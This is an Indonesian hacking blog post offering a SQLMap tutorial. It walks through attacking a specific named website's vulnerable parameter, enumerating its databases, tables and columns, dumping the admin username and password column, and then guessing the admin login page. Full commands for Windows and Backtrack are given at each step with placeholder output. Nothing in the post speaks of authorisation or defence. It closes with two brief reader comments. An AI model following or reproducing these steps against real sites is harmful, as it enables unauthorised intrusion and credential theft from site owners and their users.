Postingan
kali ini KTKArmy-Blog mau share tutorial SQLMap + Cari page adminnya
Lets begin !
Alat :
- Python
- SQLMap
- Pemahaman :3
Requirement :
- Windows
- Backtrack
How To :
1. Cari dulu target / web yang mau dipepes :3
2. Kalo udah ketemu, masukin folder SQLMap di tempat yg gampang aksesnya (biar ga ribet)...
Contoh :
Windows :
masukin folder SQLMap ke C:\Python27\tools\
(biar gampang bukanya :3)
nanti tinggal :
cd Python27
cd tools
cd sqlmap
beres :3
untuk Backtrack :
ch0c0@r00t :~$ cd /pentest/database/sqlmap/
3. kalo udah, tinggal kita coba scan target yang vuln =))
contoh : http://snakedancecondos.com/pages.php?id=10
lalu scan pake command :
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 --dbs --random-agent --flush-session
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 --dbs --random-agent --flush-session
*Ket :
-u : url address yang vulnerable
--dbs : mencari database dari target vuln
--random-agent : menggunakan user agent secara acak
--flush-session : menggunakan tehnik injeksi lain jika target ga vulnerable pake injeksi biasa
hasilnya, ketemu dibawah sendiri :3
Database :
- xxxxxxxxxxx
- information_schema
4. kalo udah ketemu, tinggal kita cari tablenya
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxx --tables --time-sec=5 --random-agent
Backtrack :
.sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --tables --random-agent --time-sec=5
**ket :
-D : menggunakan database yang ditemukan sebagai titik scanner
--tables : mencari data table yang ada pada database (-D)
--time-sec=5 : menentukan timing scanner dari sqlmap (5 aja defaultnya kalo mau diganti bisa diganti )
dan hasilnya juga ketemu dibawah sendiri :3
Table Found :
-------------------------------
-------------------------------
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
--- -xxxxxxx ---
-------------------------------
-------------------------------
5. Nahh, kalo udah kaya gini tinggal scan column aja
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --columns --random-agent
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --columns --random-agent
**Ket :
-T : table yang digunakan untuk titik scanning
--columns : mencari data columns yang terdapat pada data table
nahh, nanti munculnya kaya begini :
Columns Found :
-------------------------------
-------------------------------
--- -xxxxxxx_admin ---
--- -xxxxxxx_password ---
--- -xxxxxxx_id ---
--- -xxxxxxx ---
-------------------------------
-------------------------------
6. Kalo udah, kita tinggal dump columnnya aja :V
xixixiixixiii....
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx -C xxxxxx --dump --random-agent --time-sec=5
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx -C xxxxxx_admin --dump --random-agent --time-sec=5
**Ket :
-C xxxxxx_admin : Mencari isi data dari column yang terdapat pada column xxxxxx_admin
--dump : menampilkan hasil dari data column.
**Note :
waktu nyecan, bila muncul pertanyaan, antara suruh milih angka 1 atau 2...
pilih aja angka 1, karena kalo milih angka 2, akan melakukan dump pada semua column ( butuh waktu lama :3 )
dan, munculnya :
-------------------------------
-------------------------------
--- ---
--- -xxxxxxx_admin ---
-------------------------------
-------------------------------
yah begitulah
sama cara untuk mencari data column yang lainnya :3
++ Cara Mencari Admin Page SQL Injection ++
ini cara yang paling penting :3
kalo udah dapet username + password admin, tinggal scan page adminnya, caranya :
Windows :
python sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --search --random-agent
atau :
sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --search -C xxxxx_admin --random-agent
Backtrack :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx -T xxxxxxx --search --random-agent
atau :
./sqlmap.py -u http://snakedancecondos.com/pages.php?id=10 -D xxxxxxxx --search -C xxxxx_admin --random-agent
**Ket :
--search : mencari sebuah data, antara table dan column (terserah
penempatan mau ditaruh diantara -T*tables* atau -C*columns*) karena
fungsi utama --search adalah mencari data tertentu dari tables atau
column :3
Cara ke 2 : Mencari admin dengan Logika
cara ini emang lumayan ampuh :3
untuk mencari page/halaman admin
Logika :
kalo username yang ketemu : admin
maka kalo dicoba, pasti akan sama dengan halaman admin..
contoh :
user : admin
pass : admin123
maka halaman loginnya : http://snakedancecondos.com/admin
dan voila, pasti ketemu :3
Logikanya, mencari page/halaman admin itu susah2 gampang :3
penting, kita bisa mengkreasikan tehnik tersebut
Sekian dari ane, KTKArmy-Blog ...
maaf kalo artikelnya panjang
soalnya biar kita ngerti, dasar2nya dalam penggunaannya dan gampang untuk mengkreasikan penggunaanya jadi lebih ampuh
ga asal pake :3
hihih
Langganan:
Posting Komentar (Atom)
nice om . tapi pointernya ada yg muter" mulu harap dihilangkan
BalasHapusmakasi atas ilmunya